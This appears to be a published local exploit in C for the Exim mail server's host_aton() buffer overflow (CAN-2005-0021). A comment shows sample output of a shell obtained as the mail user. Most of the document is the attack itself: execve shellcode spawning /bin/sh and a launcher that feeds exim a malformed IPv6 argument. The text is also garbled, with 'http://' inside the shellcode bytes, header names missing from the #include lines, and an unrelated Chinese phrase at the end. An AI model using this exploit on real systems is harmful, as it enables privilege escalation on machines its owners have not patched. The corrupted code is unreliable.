/* Exim <= 4.43-r2 host_aton() local exploit * ========================================= * Exim is an highly configurable message transfer agent (MTA) developed * at the University of Cambridge.A buffer overflow has been found in the * host_aton() function of exim (CAN-2005-0021).A local attacker could * trigger the buffer overflow in host_aton() by supplying an illegal * IPv6 address with more than 8 components, using a command line option. * * linux tmp $ id * uid=1000(user) gid=100(users) groups=10(wheel),18(audio),100(users) * linux tmp $ ./eximx /usr/sbin/exim * [ GNU/Linux Exim <= 4.43-r2 host_aton() local exploit * * **** SMTP testing session as if from host ::%A::%A::%A::%A::%A::%A::%A::%A::%A::%A * **** but without any ident (RFC 1413) callback. * **** This is not for real! * * >>> host in host_lookup? yes (matched "*") * >>> looking up host name for ::%A::%A::%A::%A::%A::%A::%A::%A::%A::%A * sh-2.05b$ id * uid=8(mail) gid=12(mail) * sh-2.05b$ * * - prdelka */ #include #include char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x50\x68""http://sh""\x68""/bin""\x89\xe3" "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; char cmd1[]="-bh"; char cmd2[]="::%A::%A::%A::%A::%A::%A::%A::%A::%A::%A"; int main(int argc,char* argv[]) { printf("[ GNU/Linux Exim <= 4.43-r2 host_aton() local exploit\n"); if(argc < 2) { printf("Error: [path]\n"); exit(0); } char *env[] = {NULL}; execle(argv[1],argv[1],cmd1,cmd2,shellcode,NULL,env); exit(0); }

亚洲欧美在线